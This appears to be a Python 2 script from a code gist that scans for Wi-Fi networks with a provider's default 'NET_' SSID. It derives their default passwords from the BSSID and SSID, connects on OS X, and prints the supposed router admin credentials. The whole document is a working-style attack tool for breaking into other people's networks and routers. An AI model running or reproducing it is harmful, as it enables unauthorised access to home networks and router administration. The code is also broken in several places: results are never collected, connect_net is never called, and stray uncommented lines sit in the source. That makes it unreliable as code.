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Last active December 1, 2016 21:47
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# -*- coding: utf-8 -*-
import subprocess
Only works with OS X
run with sudo
def scan_network() :
scan = ''
while scan == '' : # for some reason airport fails randomly
scan = subprocess.check_output(["/System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport","scan"]) # scan the area for wifi
scan = scan.split("\n")
results = []
for w in scan :
w = filter(None,w.split(" "))
if any("NET_" in z for z in w) : #filter the NET's default SSID
print "Found WIFI !"
wifi = [w[0]]
# the password consists of CM_MAC last 4 hexas of the router , which are the third hexa of the BSSID plus the last 3 hexas of the SSID
password = ''.join(w[1].upper().split(":")[2:3])+w[0].split("_")[1][2:]
return results
def connect_net(wifi) :
print "Trying to connect..."
connect = subprocess.check_output(["networksetup", "-setairportnetwork", "en0", wifi[0] ,wifi[1]])
print connect
if "Failed" in connect :
print "nope :("
return 0
print "Connected ! have fun (:"
print "Here, the admin credentials of the router"
print "User : "+wifi[0]
print "Password : NET_"+wifi[1][2:] # the password is the full CM_MAC
print "yeah ,I know..."
def main() :
print "NET OWNER 0.1v"
print "≈≈≈≈≈≈≈≈≈≈≈≈≈≈"
wifi_available= scan_network()
if len(wifi_available) == 0 :
print "No NET WiFi available :'("
for wifi in wifi_available :
print "WI-FI : "+wifi[0]
print "Password : "+wifi[1]
if __name__ == "__main__" :
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